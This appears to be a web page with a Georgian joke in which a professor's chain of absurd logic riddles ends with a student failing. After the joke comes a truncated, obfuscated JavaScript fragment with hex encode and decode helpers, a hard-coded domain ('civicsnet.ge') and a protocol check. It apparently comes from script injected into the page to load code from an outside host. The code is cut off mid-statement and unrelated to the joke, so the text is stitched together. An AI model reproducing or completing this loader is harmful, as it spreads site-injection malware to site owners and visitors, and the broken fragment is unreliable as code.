ლოგიკა

პროფესორი:
— თვითმფრინავში 500 აგური იყო, ერთი გადმოვარდა. რამდენი აგური დარჩა თვითმფრინავში?

სტუდენტი:
— ეს ხომ ძალიან მარტივია! 499 აგური დარჩა.

— სწორია. შემდეგი კითხვა: როგორ მოვათავსოთ სპილო მაცივარში სამი მოქმედებით?

— 1. ვაღებთ მაცივარს. 2. ვსვამთ სპილოს მაცივარში. 3. ვხურავთ მაცივარს.

— შემდეგი. როგორ მოვათავსოთ ირემი მაცივარში ოთხი მოქმედებით?

— 1. ვაღებთ მაცივარს. 2. გამოგვყავს სპილო . 3. ვსვამთ ირემს. 4. ვხურავთ მაცივარს.

— მშვენიერია! ცხოველთა მეფეს ლომს დაბადების დღე აქვს. მისალოცად უკლებლივ ყველა ცხოველი მივიდა, ერთის გარდა. რატომ?

— იმიტომ, რომ ირემი ჯერ კიდევ მაცივარშია.

— შესანიშნავია! ახლა კი გავაგრძელოთ. შეუძლია ბებოს ნიანგებით სავსე ჭაობი გადაცუროს?

— რა თქმა უნდა! ყველა ნიანგი ხომ ლომის დაბადების დღეზეა.

პროფესორი: — ყოჩაღ! ახლა კი ბოლო შეკითხვა: ბებო გააღწია ცარიელ ჭაობს, ერთი ნიანგიც კი არ შეხვდა, მაგრამ მაინც მოკვდა. რა დაემართა?

სტუდენტი: — ჰმმმ…. იქნებ დაიხრჩო?

— პროფესორი: არა, მას დაეცა აგური, რომელიც თვითმფრინავიდან გადმოვარდა. გადაბარებაზე მოხვალთ

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply